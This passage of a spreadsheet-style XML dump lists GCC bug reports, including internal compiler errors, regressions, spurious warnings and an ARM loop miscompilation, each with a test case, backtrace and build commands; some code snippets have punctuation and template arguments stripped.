   int int) [with _CharT = char _Traits = std::char_traits]':
/opt/gcc-3.0/include/g++-v3/bits/ostream.tcc:701:   instantiated from `std::basic_ostream&amp; std::operator&amp; const char*) [with _Traits = std::char_traits]'
ostream_test.cc:6:   instantiated from here
/opt/gcc-3.0/include/g++-v3/bits/ostream.tcc:490: warning: declaration of `
   __fmt' shadows previous local</t>
  </si>
  <si>
    <t>achim.gaedke</t>
  </si>
  <si>
    <t>GCC-16678</t>
  </si>
  <si>
    <t>warning: suggest parentheses around assignment used as truth value</t>
  </si>
  <si>
    <t>Compiling the code snippet
========================================
#include
void foo(std::istream &amp;s)
{
    int i
    s &gt;&gt; i
}
========================================
with g++ -O3 -Wall on mainline I get the warning:
/Work/reichelt/GCC/FARM/gcc-3.5-20040722/bin/../lib/gcc/i686-pc-linux-gnu/3.5.0/../../../../include/c++/3.5.0/bits/locale_facets.tcc:
In member function `_InIter std::num_get&lt;_CharT
_InIter&gt;::_M_extract_int(_InIter _InIter std::ios_base&amp; std::_Ios_Iostate&amp;
_ValueT&amp;) const [with _ValueT = long int _CharT = char _InIter =
std::istreambuf_iterator &gt;]':
/Work/reichelt/GCC/FARM/gcc-3.5-20040722/bin/../lib/gcc/i686-pc-linux-gnu/3.5.0/../../../../include/c++/3.5.0/bits/locale_facets.tcc:693:  
instantiated from `_InIter std::num_get::do_get(_InIter
_InIter std::ios_base&amp; std::_Ios_Iostate&amp; long int&amp;) const [with _CharT =
char _InIter = std::istreambuf_iterator &gt;]'
/Work/reichelt/GCC/FARM/gcc-3.5-20040722/bin/../lib/gcc/i686-pc-linux-gnu/3.5.0/../../../../include/c++/3.5.0/bits/locale_facets.h:2014:  
instantiated from `_InIter std::num_get::get(_InIter _InIter
std::ios_base&amp; std::_Ios_Iostate&amp; long int&amp;) const [with _CharT = char
_InIter = std::istreambuf_iterator &gt;]'
/Work/reichelt/GCC/FARM/gcc-3.5-20040722/bin/../lib/gcc/i686-pc-linux-gnu/3.5.0/../../../../include/c++/3.5.0/bits/istream.tcc:195:  
instantiated from `std::basic_istream&amp;
std::basic_istream::operator&gt;&gt;(int&amp;) [with _CharT = char
_Traits = std::char_traits]'
bug.cc:6:   instantiated from here
/Work/reichelt/GCC/FARM/gcc-3.5-20040722/bin/../lib/gcc/i686-pc-linux-gnu/3.5.0/../../../../include/c++/3.5.0/bits/locale_facets.tcc:537:
warning: suggest parentheses around assignment used as truth value
/Work/reichelt/GCC/FARM/gcc-3.5-20040722/bin/../lib/gcc/i686-pc-linux-gnu/3.5.0/../../../../include/c++/3.5.0/bits/locale_facets.tcc:580:
warning: suggest parentheses around assignment used as truth value
In fact line 580 in locale_facets.tcc reads:
            else if (__q = __traits_type::find(__lit_zero __len __c))
Grepping with the command
  egrep -nH if \([_a-zA-Z0-9]+ = 
through mainline's sources there some more instances of such deprecated coding:
gcc/fixinc/procopen.c:95:  if (pz_cmd = *pp_args
gcc/local-alloc.c:1359:           if (r1 = XEXP (note 0) REG_P (r1)
gcc/tlink.c:605:      else if (p = strchr (oldq '') p)
libjava/java/lang/dtoa.c:325:      if (j = 11 - hi0bits (word0 (d2) &amp;
Frac_mask))
libjava/java/lang/mprec.c:388:      if (y = *xb++)
libjava/java/lang/mprec.c:815:  if (y = d1)
libjava/java/lang/mprec.c:817:      if (k = lo0bits (&amp;y))
libstdc++-v3/include/bits/locale_facets.tcc:371:          else if (__q =
__traits_type::find(__lit_zero 10 __c))
libstdc++-v3/include/bits/locale_facets.tcc:537:            else if (__q =
__traits_type::find(__lit_zero __len __c))
libstdc++-v3/include/bits/locale_facets.tcc:580:            else if (__q =
__traits_type::find(__lit_zero __len __c))
libstdc++-v3/include/bits/locale_facets.tcc:1123:      if (__p =
char_traits::find(__ws __len __cdec))
libstdc++-v3/include/bits/locale_facets.tcc:1359:             if (__q =
__traits_type::find(__lit_zero 10 *__beg))
This should be fixed.</t>
  </si>
  <si>
    <t>GCC-38638</t>
  </si>
  <si>
    <t>[4.3 regression] ICE superfluous 'typename'</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.2.0:
========================================
struct A
{
  template void foo(int i)
  {
    typename A::foo(i)
  }
}
========================================
bug.cc: In member function 'void A::foo(int)':
bug.cc:5: internal compiler error: in start_decl at cp/decl.c:4189
Please submit a full bug report [etc.]
The code was wrongly accepted by GCC 3.4.x 4.0.x and 4.1.x.
It was correctly rejected by GCC 3.3.6 and earlier.</t>
  </si>
  <si>
    <t>GCC-79085</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE with placement new to unaligned location</t>
  </si>
  <si>
    <t>Created attachment 40517
Placement new to unaligned location
Hi
The attached file ICE when compiled with -Os. The ICE is due to the assert in assign_temp when called from expand_call because TREE_ADDRESSABLE(type) is true. This is set from the C++ frontend in finish_struct_bits because there is a non default constructor and expand_call calls assign_temp because the location in which the return value optimization is not sufficiently aligned.
Due to the check to SLOW_UNALIGNED_ACCESS in expand_call this does not affect all targets. I was able to reproduce the bug can be reproduced on alpha-linux-gnu by adapting size_t and ptrdiff_t accordingly.
Setting the component to C++ based on the comment regarding the assertion of TREE_ADDRESSABLE in assign_temp.</t>
  </si>
  <si>
    <t>GCC-30298</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 regression] ICE with duplicate broken inheritance</t>
  </si>
  <si>
    <t>==================================
union A {}
struct B : A {}
struct B : A {}
==================================
bug.cc:3: error: base type 'A' fails to be a struct or class type
bug.cc:4: internal compiler error: in xref_basetypes at cp/decl.c:9865
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-50565</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 Regression] initializer element is not computable at load time</t>
  </si>
  <si>
    <t>Created attachment 25379
preprocessed source
[forwarded from http://bugs.debian.org/642144]
this may be a duplicate of PR38354 compiles on 32bit targets on 64bit targets it succeeds with 4.4 but fails with 4.5 4.6 and trunk:
$ gcc -c message.i 
message.i:154:2: error: initializer element is not computable at load time
message.i:154:2: error: (near initialization for 'byte_order[1].offset')</t>
  </si>
  <si>
    <t>GCC-34934</t>
  </si>
  <si>
    <t>[4.2 Regression] -O1 crash compile *** glibc detected *** /usr/lib/gcc/i486-linux-gnu/4.2.3/cc1: double free or corruption (!prev)</t>
  </si>
  <si>
    <t>also crash with:
gcc version 4.1.3 20071209 (prerelease) (Debian 4.1.2-18)
gcc version 4.3.0 20080113 (experimental) [trunk revision 131510] (Debian 20080113-1)
gcc -v -W -Wall -O2 -c send_tiny.c
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.3 20071123 (prerelease) (Debian 4.2.2-4)
 /usr/lib/gcc/i486-linux-gnu/4.2.3/cc1 -quiet -v send_tiny.c -quiet -dumpbase send_tiny.c -mtune=generic -auxbase send_tiny -O2 -W -Wall -version -o /tmp/ccAIKCUF.s
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/i486-linux-gnu/4.2.3/../../../../i486-linux-gnu/include
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc/i486-linux-gnu/4.2.3/include
 /usr/include
End of search list.
GNU C version 4.2.3 20071123 (prerelease) (Debian 4.2.2-4) (i486-linux-gnu)
        compiled by GNU C version 4.2.3 20071123 (prerelease) (Debian 4.2.2-4).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: e5f75b43edef04f899196b1bf42593d5
send_tiny.c: In function sendto_realops_lev:
send_tiny.c:190: warning: implicit declaration of function ircsprintf
send_tiny.c:192: warning: implicit declaration of function strlen
send_tiny.c:192: warning: incompatible implicit declaration of built-in function strlen
send_tiny.c:194: warning: implicit declaration of function vsendto_one
*** glibc detected *** /usr/lib/gcc/i486-linux-gnu/4.2.3/cc1: double free or corruption (!prev): 0x0866a778 ***
======= Backtrace: =========
/lib/i686/cmov/libc.so.6[0xb7ece735]
/lib/i686/cmov/libc.so.6(cfree+0x90)[0xb7ed21a0]
/usr/lib/gcc/i486-linux-gnu/4.2.3/cc1[0x83b5300]
======= Memory map: ========
08048000-08585000 r-xp 00000000 03:46 156160     /usr/lib/gcc/i486-linux-gnu/4.2/cc1
08585000-0858a000 rw-p 0053c000 03:46 156160     /usr/lib/gcc/i486-linux-gnu/4.2/cc1
0858a000-0867f000 rw-p 0858a000 00:00 0          [heap]
b7800000-b7821000 rw-p b7800000 00:00 0
b7821000-b7900000 ---p b7821000 00:00 0
b7923000-b792d000 r-xp 00000000 03:07 180657     /lib/libgcc_s.so.1
b792d000-b792e000 rw-p 00009000 03:07 180657     /lib/libgcc_s.so.1
b7957000-b7b7f000 rw-p b7957000 00:00 0
b7b7f000-b7c62000 r--p 0022a000 03:46 63924      /usr/lib/locale/locale-archive
b7c62000-b7e62000 r--p 00000000 03:46 63924      /usr/lib/locale/locale-archive
b7e62000-b7e63000 rw-p b7e62000 00:00 0
b7e63000-b7faa000 r-xp 00000000 03:07 195734     /lib/i686/cmov/libc-2.7.so
b7faa000-b7fab000 r--p 00147000 03:07 195734     /lib/i686/cmov/libc-2.7.so
b7fab000-b7fad000 rw-p 00148000 03:07 195734     /lib/i686/cmov/libc-2.7.so
b7fad000-b7fb0000 rw-p b7fad000 00:00 0
b7fb5000-b7fdb000 rw-p b7fb5000 00:00 0
b7fdb000-b7fdc000 r-xp b7fdb000 00:00 0          [vdso]
b7fdc000-b7ff8000 r-xp 00000000 03:07 179187     /lib/ld-2.7.so
b7ff8000-b7ffa000 rw-p 0001b000 03:07 179187     /lib/ld-2.7.so
bfacc000-bfae1000 rw-p bfacc000 00:00 0          [stack]
send_tiny.c:131: internal compiler error:  
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .</t>
  </si>
  <si>
    <t>eshkinkot</t>
  </si>
  <si>
    <t>GCC-37176</t>
  </si>
  <si>
    <t>[arm] Optimizer omits loop condition leading to failing code</t>
  </si>
  <si>
    <t>My recent 2.6.21.6-rt21 kernel build for ARM dumps a NULL pointer dereference exception due to a missing loop termination condition that was omitted by the gcc 4.3.1 optimizer.
This happens in net/ipv4/inet_hashtables.c in function inet_lookup_listener_slow which is inlined by the optimizer (-Os -O2 -O3) into function inet_lookup_listener:
===== C-Code:
  sk_for_each(sk node head) {
       const struct inet_sock *inet = inet_sk(sk)
       if (inet-&gt;num == hnum &amp;&amp; !ipv6_only_sock(sk)) {
       ...
       }
   }
===== Generated assembler code with my comments:
.L57:
        mov     r4 r0
        ldr     r1 [r4] #-8          @ node = node-&gt;next THIS FAILS !!!
#APP
@ 108 include/asm/processor.h 1
        pld     [r1 #0]               @ preload node
@ 0  2
        ldrh    r3 [r4 ip]           @ load 'inet-&gt;num' ...
        mov     r0 r1
        cmp     r3 r5                 @ ... and compare this with 'hnum'
        bne     .L57                   @ if 'inet-&gt;num != hnum' continue loop
        b       .L58                   @ do the work inside the loop
===== why this code fails:
If you look at sk_for_each macro it is replaced with something like:
for (node=head node  node=node-&gt;next)
Unfortunately the condition for node being non zero is not evaluated every loop. It seems to me that this important condition is replaces with the inner if-condition inet-&gt;num == hnum whereas node!=0 is evaluated later on.
===== possible workarounds:
Do not use -Os -O2 -O3. -O1 and -O0 works.
E.g. this is the code for the -O1 case:
.L47:
        mov     r3 r0
        mov     r4 ip
.L50:
        cmp     r2 #0          @ CHECKS node != 0       !!!!!!!
        beq     .L49            @ terminates loop
        mov     r0 r3
        mov     ip r4
        b       .L51            @ next loop
.L43:
        mvn     r0 #0
        mov     ip #0
        mov     r3 #516
        add     lr r3 #2
.L51:
        mov     r4 r2
        ldr     r2 [r4] #-8
#APP
@ 108 include/asm/processor.h 1
        pld     [r2 #0]
@ 0  2
        mov     r1 r4
        ldrh    r3 [r4 lr]
        cmp     r3 r5
        bne     .L47
        b       .L54
.L49:
===== Compiler version: 4.3.1 (release version)
===== System type: ARM Linux XScale-PXA255 (ARMv5-TE)
===== Compiler configure command line:
  $ ../gcc-4.3.1/configure --prefix=/tmp/tc3/sysroot/cross --target=arm-linux --host=i686-pc-linux-gnu --disable-multilib --with-sysroot=/tmp/tc3/sysroot --disable-nls --enable-shared --enable-languages=cc++ --enable-__cxa_atexit --enable-c99 --enable-threads=posix --with-float=soft
===== Commandline: (generated by kernel makefile hierarchy)
arm-linux-gcc -Wp-MDnet/ipv4/.inet_hashtables.o.d  -nostdinc -isystem tmp/tc3/sysroot/cross/lib/gcc/arm-linux/4.3.1/include -D__KERNEL__ -Iinclude  in
clude include/linux/autoconf.h -mlittle-endian -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Os -marm fno-omit-frame-pointer -mapcs -mno-sched-prolog -mabi=apcs-gnu -mno-thumb-interwork -D__LINUX_ARM_ARCH__=5 -march=armv5te -mtune=xscale -Wa-mcpu=xscale  -msoft-float -Uarm -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-protector -Wdeclaration-after-statement -Wno-pointer-sign   -DFW_VERSION=\1.1.1-cec0\ -DKBUILD_STR(s)=\#s -DKBUILD_BASENAME=KBUILD_STR(inet_hashtables)  -DKBUILD_MODNAME=KBUILD_STR
(inet_hashtables) -c -o net/ipv4/inet_hashtables.o net/ipv4/inet_hashtables.c
===== Compiler outputs/warnings: none
===== Attachments: .c .i and .s files</t>
  </si>
  <si>
    <t>berndorfer</t>
  </si>
  <si>
    <t>GCC-69946</t>
  </si>
  <si>
    <t>[6 Regression] Invalid ppc64 assembly emitted starting with r226005</t>
  </si>
  <si>
    <t>At -O2 following testcase does not assemble on both powerpc64-linux and powerpc64le-linux starting with r226005.  The error is:
vl_idct.s: Assembler messages:
vl_idct.s:27: Error: operand out of range (44 is not between 0 and 31)
struct A
{
  int a : 4
  int : 2
  int b : 2
  int : 2
  int c : 2
  int d : 1
  int e
}
struct B
{
  int a : 4
} *a
void bar (struct A)
void
foo (void)
{
  struct B b = a[0]
  struct A c
  c.a = b.a
  c.b = 1
  c.c = 1
  c.d = 0
  bar (c)
}</t>
  </si>
  <si>
    <t>GCC-59070</t>
  </si>
  <si>
    <t>Captured object is being moved from the lambda on returning it.</t>
  </si>
  <si>
    <t>I'm using GCC 4.8.1
Here is the code which reproduces this bug:
   std::vector items {default}
   auto add = [=](std::string item) mutable 
              { items.push_back(item) return items }
   std::cout &lt;&lt; add(one) &lt;&lt; std::endl
   std::cout &lt;&lt; add(two) &lt;&lt; std::endl
   std::cout &lt;&lt; add(three) &lt;&lt; std::endl
Imagine that operator&lt;&lt; is overloaded for std::vector which all items on ONE line. The expected out is:
   default one 
   default one two 
   default one two three
But it actually outputs this:
   default one 
   two 
   three
So it seems on the first return the captured vector is moved. 
However if I define the lambda as:
   auto add = [=](std::string item) mutable 
              { items.push_back(item) auto  return x } 
OR as:
   auto add = [=](std::string item) mutable 
              { auto  x.push_back(item) return x } 
It prints the expected output.</t>
  </si>
  <si>
    <t>sir_nawaz959</t>
  </si>
  <si>
    <t>GCC-67600</t>
  </si>
  <si>
    <t>[5 Regression] Segfault when assigning only one char to ostreambuf_iterator compiled with -O2 or -O3</t>
  </si>
  <si>
    <t>#include 
#include 
int main()
{
  std::basic_ostringstream ostr
  std::ostreambuf_iterator iter(ostr.rdbuf())
  *iter++ = 'X'  // Segmentation fault if -O2 or -O3.
// *iter++ = 'Y' // But pass if adding this statement.
  std::cout &lt;&lt; ostr.str() &lt;&lt; '\n'
  return 0
}
Description:
If the above simplified code is compiled with -O2 or -O3 segmentation fault
happens in *iter++ = 'x' statement but -O0 -O1 or -Os are O.K.
If I add the *iter++ = 'Y' statement and compile it with -O2 or -O3 it
can print XY successfully.
gcc versions:
Fails on gcc-5 (x86_64-redhat-linux on Fedora-22)
and gcc-6.0.0 (20150916 (experimental)).
Pass on gcc-4.8 and gcc-4.9</t>
  </si>
  <si>
    <t>cctsai57</t>
  </si>
  <si>
    <t>GCC-31167</t>
  </si>
  <si>
    <t>ICE wnen using __int128_t on x86_64</t>
  </si>
  <si>
    <t>The source below is meant to return an int32_t that is the result of rounding the upper 32 bits of an __int128_t where rounding pays attention to the bits that have been discarded and the low bit of what is kept.  Since it's an ICE the details are probably irrelevant. 
salmonj@drda0003.nyc$ cat brokengcc.cxx
#include 
int32_t round32hi(const __int128_t &amp;arg){
    const int SHIFT = 96
    const int mshift = 96
    const __int128_t M = (~__int128_t(0))&lt;&lt;mshift
    const __int128_t L = (~M) + 1
    const __int128_t L1 = __int128_t(L)&gt;&gt;1
    const __int128_t Mlo = __int128_t(~M)&gt;&gt;1
    __int128_t vv = arg 
    if( (arg &amp; (L1))      // hi bit of discard set
        &amp;&amp; ( (arg &amp; Mlo)  // and ( any other bits of discard set
             || (arg &amp; L) ) )   //       or lo bit of keep set )
        vv += L
    return int32_t(vv&gt;&gt;SHIFT)
}
salmonj@drda0003.nyc$ gcc -v -c -O brokengcc.cxx
Reading specs from /proj/desres/root/Linux/x86_64/gcc/4.1.2/lib/gcc/x86_64-unknown-linux-gnu/4.1.2/specs
Target: x86_64-unknown-linux-gnu
Configured with: /state/partition1/tmp/tmpwsa5nr/gcc-4.1.2/configure --enable-languages=cc++fortran --prefix=/proj/desres/root/Linux/x86_64/gcc/4.1.2
Thread model: posix
gcc version 4.1.2
 /proj/desres/root/Linux/x86_64/gcc/4.1.2/libexec/gcc/x86_64-unknown-linux-gnu/4.1.2/cc1plus -quiet -v -D_GNU_SOURCE brokengcc.cxx -quiet -dumpbase brokengcc.cxx -mtune=k8 -auxbase brokengcc -O -version -o /scratch/tmp/ccer1yVv.s
ignoring nonexistent directory /proj/desres/root/Linux/x86_64/gcc/4.1.2/lib/gcc/x86_64-unknown-linux-gnu/4.1.2/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /proj/desres/root/Linux/x86_64/gcc/4.1.2/lib/gcc/x86_64-unknown-linux-gnu/4.1.2/../../../../include/c++/4.1.2
 /proj/desres/root/Linux/x86_64/gcc/4.1.2/lib/gcc/x86_64-unknown-linux-gnu/4.1.2/../../../../include/c++/4.1.2/x86_64-unknown-linux-gnu
 /proj/desres/root/Linux/x86_64/gcc/4.1.2/lib/gcc/x86_64-unknown-linux-gnu/4.1.2/../../../../include/c++/4.1.2/backward
 /usr/local/include
 /proj/desres/root/Linux/x86_64/gcc/4.1.2/include
 /proj/desres/root/Linux/x86_64/gcc/4.1.2/lib/gcc/x86_64-unknown-linux-gnu/4.1.2/include
 /usr/include
End of search list.
GNU C++ version 4.1.2 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 3.4.3 20041212 (Red Hat 3.4.3-9.EL4).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 9975ef1eec7edce53d85d34b86837808
brokengcc.cxx: In function 'int32_t round32hi(const __int128_t&amp;)':
brokengcc.cxx:16: error: unrecognizable insn:
(insn 92 91 50 3 (parallel [
            (set (reg:DI 38 r9 [ vv+8 ])
                (plus:DI (plus:DI (ltu:DI (reg:CC 17 flags)
                            (const_int 0 [0x0]))
                        (reg:DI 38 r9 [ vv+8 ]))
                    (const_int 4294967296 [0x100000000])))
            (clobber (reg:CC 17 flags))
        ]) -1 (nil)
    (nil))
brokengcc.cxx:16: internal compiler error: in extract_insn at recog.c:2084
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
salmonj@drda0003.nyc$</t>
  </si>
  <si>
    <t>john.salmon</t>
  </si>
  <si>
    <t>GCC-61278</t>
  </si>
  <si>
    <t>ICE with LTO (lto-wrapper failed) on x86_64-linux-gnu in 64-bit mode</t>
  </si>
  <si>
    <t>The current gcc trunk produces an ICE on the following code when using LTO on x86_64-linux-gnu in 64-bit mode (but not 32-bit). 
This is a regression from 4.9.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140521 (experimental) [trunk revision 210675] (GCC) 
$ 
$ gcc-4.9.0 -flto -O0 -c foo.c
$ gcc-4.9.0 -flto -O1 -c main.c
$ gcc-4.9.0 -flto -O1 foo.o main.o
$ a.out
$ 
$ gcc-trunk -O0 -c foo.c
$ gcc-trunk -O1 -c main.c
$ gcc-trunk -O1 foo.o main.o
$ a.out
$ 
$ gcc-trunk -flto -O0 -c foo.c
$ gcc-trunk -flto -O1 -c main.c
$ gcc-trunk -flto -O1 foo.o main.o
foo.c: In function â€˜fooâ€™:
foo.c:26:1: internal compiler error: Segmentation fault
 }
 ^
0x8c28df crash_signal
	../../gcc-trunk/gcc/toplev.c:337
0x513b40 bitmap_clear
	../../gcc-trunk/gcc/bitmap.c:311
0x513b40 bitmap_copy(bitmap_head* bitmap_head const*)
	../../gcc-trunk/gcc/bitmap.c:534
0x89a7f7 move_insn_for_shrink_wrap
	../../gcc-trunk/gcc/shrink-wrap.c:209
0x89a7f7 prepare_shrink_wrap(basic_block_def*)
	../../gcc-trunk/gcc/shrink-wrap.c:337
0x89abeb try_shrink_wrapping(edge_def** edge_def* bitmap_head* rtx_def*)
	../../gcc-trunk/gcc/shrink-wrap.c:463
0x6c5a51 thread_prologue_and_epilogue_insns
	../../gcc-trunk/gcc/function.c:5661
0x6c5a51 rest_of_handle_thread_prologue_and_epilogue
	../../gcc-trunk/gcc/function.c:6213
0x6c5a51 execute
	../../gcc-trunk/gcc/function.c:6252
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: gcc-trunk returned 1 exit status
/usr/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
$ 
$ 
$ cat foo.c
static unsigned int
fn1 (int p1 int p2)
{
  return 0
}
char a b c 
char
foo (char *p)
{
  int i
  for (b = 1  b &gt; 0 b++) 
    {
      for (i = 0 i &lt; 2 i++)
      for (a = 1 a &gt; 0 a++)
	{
	  char d[1] = { 0 }
	  if (*p)
	    break
	  c ^= fn1 (fn1 (fn1 (0 0) 0) 0)
	}
    }
  return 0
}
$ cat main.c
extern char foo (char *) 
char d 
int
main ()
{
  foo ( 
  return 0
}
$</t>
  </si>
  <si>
    <t>GCC-70002</t>
  </si>
  <si>
    <t>[6 Regression] gcc.dg/torture/pr52429.c -O2 -flto -fno-use-linker-plugin -flto-partition=none ICEs</t>
  </si>
  <si>
    <t>/home/apinski/src/local/gcc/gcc/testsuite/gcc.dg/torture/pr52429.c:24:1: internal compiler error: Segmentation fault
0xb03a5f crash_signal
        /home/apinski/src/local/gcc/gcc/toplev.c:335
0x963623 record_operand_costs
        /home/apinski/src/local/gcc/gcc/ira-costs.c:1293
0x963bd3 scan_one_insn
        /home/apinski/src/local/gcc/gcc/ira-costs.c:1471
0x963bd3 process_bb_for_costs
        /home/apinski/src/local/gcc/gcc/ira-costs.c:1592
0x9650ff find_costs_and_classes
        /home/apinski/src/local/gcc/gcc/ira-costs.c:1699
0x9665db ira_set_pseudo_classes(bool _IO_FILE*)
        /home/apinski/src/local/gcc/gcc/ira-costs.c:2239
0x1026e33 alloc_global_sched_pressure_data
        /home/apinski/src/local/gcc/gcc/haifa-sched.c:7244
0x1026e33 sched_init()
        /home/apinski/src/local/gcc/gcc/haifa-sched.c:7394
0x102857f haifa_sched_init()
---- CUT ----
Might be related to bug 64047.</t>
  </si>
  <si>
    <t>GCC-77545</t>
  </si>
  <si>
    <t>[7 Regression] ICE on valid C++11 code: in potential_constant_expression_1 at cp/constexpr.c:5480</t>
  </si>
  <si>
    <t>This is a regression from 6.2.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160909 (experimental) [trunk revision 240043] (GCC)
$
$ g++-6.2 -c small.cpp
$ clang++-3.8 -c -std=c++11 small.cpp
$
$ g++-trunk -c small.cpp
small.cpp: In function â€˜void f(A)â€™:
small.cpp:10:35: sorry unimplemented: unexpected AST of kind cleanup_stmt
   for (auto x : (A []) { a })
                                   ^
small.cpp:10:35: internal compiler error: in potential_constant_expression_1 at cp/constexpr.c:5480
0x8c1357 potential_constant_expression_1
        ../../gcc-source-trunk/gcc/cp/constexpr.c:5480
0x8c1227 potential_constant_expression_1
        ../../gcc-source-trunk/gcc/cp/constexpr.c:5039
0x8c0511 potential_constant_expression_1
        ../../gcc-source-trunk/gcc/cp/constexpr.c:5399
0x8c1ed3 potential_constant_expression
        ../../gcc-source-trunk/gcc/cp/constexpr.c:5491
0x8c1ed3 potential_nondependent_constant_expression(tree_node*)
        ../../gcc-source-trunk/gcc/cp/constexpr.c:5533
0x8c2f62 maybe_constant_value_1
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4574
0x8c2f62 maybe_constant_value(tree_node* tree_node*)
        ../../gcc-source-trunk/gcc/cp/constexpr.c:4608
0x89e941 cp_fully_fold(tree_node*)
        ../../gcc-source-trunk/gcc/cp/cp-gimplify.c:1971
0x733375 store_init_value(tree_node* tree_node* vec** int)
        ../../gcc-source-trunk/gcc/cp/typeck2.c:829
0x68ea5c check_initializer
        ../../gcc-source-trunk/gcc/cp/decl.c:6230
0x6b91fd cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc-source-trunk/gcc/cp/decl.c:6888
0x78fbc2 cp_convert_range_for(tree_node* tree_node* tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/parser.c:11451
0x7bfeb0 cp_parser_range_for
        ../../gcc-source-trunk/gcc/cp/parser.c:11335
0x7bfeb0 cp_parser_for
        ../../gcc-source-trunk/gcc/cp/parser.c:11236
0x7bfeb0 cp_parser_iteration_statement
        ../../gcc-source-trunk/gcc/cp/parser.c:11735
0x7b5b79 cp_parser_statement
        ../../gcc-source-trunk/gcc/cp/parser.c:10448
0x7b711c cp_parser_statement_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:10859
0x7b720f cp_parser_compound_statement
        ../../gcc-source-trunk/gcc/cp/parser.c:10813
0x7b73bf cp_parser_function_body
        ../../gcc-source-trunk/gcc/cp/parser.c:20832
0x7b73bf cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc-source-trunk/gcc/cp/parser.c:20868
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
--------------------------------------------
template  struct A
{ 
  A ()
  ~A ()
  T t
}
void f (A  a)
{ 
  for (auto x : (A []) { a })
}</t>
  </si>
  <si>
    <t>GCC-57927</t>
  </si>
  <si>
    <t>-march=core-avx2  different than -march=native on INTEL Haswell (i7-4700K)</t>
  </si>
  <si>
    <t>for instance
mkdir scimark2TMP
cd scimark2TMP
wget http://math.nist.gov/scimark2/scimark2_1c.zip .
unzip scimark2_1c.zip
c++ -S LU.c -O3 -march=native -o LU.native -v
c++ -S LU.c -O3 -march=core-avx2 -o LU.avx2 -v
diff LU.native LU.avx2
if you run the benchmark
gcc -O3 -march=core-avx2 *.c -lm ./a.out 5 
gcc -O3 -march=native *.c -lm ./a.out 5 
core-avx2 is better than native</t>
  </si>
  <si>
    <t>GCC-7607</t>
  </si>
  <si>
    <t>GCC gives an ICE instead of reporting an error.</t>
  </si>
  <si>
    <t>main.cpp:3: Internal compiler error in tree_low_cst at tree.c:3484
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
GCC 3.1.1 20020718 (prerelease)
Environment:
CygWin Windows 2000
How-To-Repeat:
g++ tmp_char.cpp</t>
  </si>
  <si>
    <t>comer</t>
  </si>
  <si>
    <t>GCC-48952</t>
  </si>
  <si>
    <t>ICE in inline_merge_summary during linux kernel LTO build</t>
  </si>
  <si>
    <t>When running a Linux kernel LTO build with recent mainline
(gcc version 4.7.0 20110510 (experimental) (GCC))
I get a segfault during the final lto-wpa phase
In gdb I get
Program received signal SIGSEGV Segmentation fault.
inline_merge_summary (edge=0x7f1ce05d90d0)
    at ../../gcc/gcc/ipa-inline-analysis.c:2025
2025          &amp;&amp; ipa_get_cs_argument_count (IPA_EDGE_REF (edge
(gdb) bt
#0  inline_merge_summary (edge=0x7f1ce05d90d0)
    at ../../gcc/gcc/ipa-inline-analysis.c:2025
#1  0x000000000085b079 in inline_call (e=0x7f1ce05d90d0 update_original=Unhandled dwarf expression opcode 0xf3
)
    at ../../gcc/gcc/ipa-inline-transform.c:185
#2  0x0000000000854561 in inline_small_functions ()
    at ../../gcc/gcc/ipa-inline.c:1451
#3  ipa_inline () at ../../gcc/gcc/ipa-inline.c:1643
#4  0x000000000063c509 in execute_one_pass (pass=0xfff720)
    at ../../gcc/gcc/passes.c:1556
#5  0x000000000063cbca in execute_ipa_pass_list (pass=0xfff720)
    at ../../gcc/gcc/passes.c:1922
#6  0x000000000049ffe5 in do_whole_program_analysis ()
